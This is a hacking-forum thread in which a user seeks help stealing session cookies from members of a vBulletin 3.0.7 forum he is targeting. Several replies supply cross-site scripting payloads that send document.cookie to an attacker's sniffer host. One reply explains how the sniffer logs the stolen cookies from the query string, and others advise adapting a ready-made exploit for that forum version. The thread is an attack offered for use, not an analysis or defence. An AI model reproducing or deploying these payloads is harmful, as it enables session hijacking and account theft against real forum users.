Hi guyz

I uploaded my own sniffer to my host and I did all the settings , I posted these codes to steal cookie <a href="http://myhost/s.jpg?it is test">click me</a>

and <img src="http:/myhost/s.jpg"> and <script>img = new Image(); img.src = "http://myhost/s.jpg?"+document.cookie;</script>

I posted above codes to my target forum but they worked like text I mean they did not work where should I write these codes to work ,My target forum's html codes are off. Which codes should I use to steal cookie? Above codes do not work why?

Thanxx

To steal cookies you should use this codes (try them all):

'><script>img=new Image();img.src="http:/myhost/s.jpg.?"+document.cookie;"+document.cookie;</script>

'><script src=http:/myhost/s.jpg></script>


Enjoy :D

this <a href="http://myhost/s.jpg?it is test">click me</a> and this
<img src="http:/myhost/s.jpg">

is not a cookie stealing codes. because cookie stealers use JAVA scripts. The Cookies cames to haker in QUERY STRING.
in http://bbs.com/news.php?news_id=6&print=on query string is "news_id=6&print=on".
The cookie sniffer SAVE all query strings that connect to him.

IF user's cookie is user=Mike;password=xxx
JAVA script replace +document.cookie in <img src='http://ya.ru/logo.gif' onload='i=new Image();i.src="http://www.gfdfdgdfg/?"+document.cookie;'> for real cookies from user's browser and connect to http://www.gfdfdgdfg.com/sniffer.php?user=Mike;password=xxx browser think that it is a image, but don't display it.

YOU SEE. QUERY_STRING is ?user=Mike;password=xxx it will be saved by your SNIFFER http://www.gfdfdgdfg.com/sniffer.php

Sorry for bad, bad English.

To steal cookies you should use this codes (try them all):

'><script>img=new Image();img.src="http:/myhost/s.jpg.?"+document.cookie;"+document.cookie;</script>

'><script src=http:/myhost/s.jpg></script>


Enjoy :D


Where should I write these codes if ı post them as an answer for a topic, they work like a text ,cookies do not reach to my sniffer??

What forum?

Where should I write these codes if ı post them as an answer for a topic, they work like a text ,cookies do not reach to my sniffer??

http://www.forum.antichat.ru/thread20140.html

Read this text and if you have any questions just write them here.

Where should I write these codes if ı post them as an answer for a topic, they work like a text ,cookies do not reach to my sniffer??
You must know the version of that forum. Those codes won't work. You should find a ready-made exploit for the version of that forum, edit it and write the address of your sniffer. Or learn to find some bugs to by-pass different filters.

Forum ı am trying to steal cookie is vBulletin Version 3.0.7
I tried some exploits in general but do you suggest any special and there is no filters for codes , ı just think ı make something wrong in somewhere but where :D

Are you trying to steal cookies from the users of our forum?=)))
That forum may be patched =\

I agree with NeMiNeM .
Maybe the forum be patched by someone.

might be patched ,I will try harder thanx

Good luck:)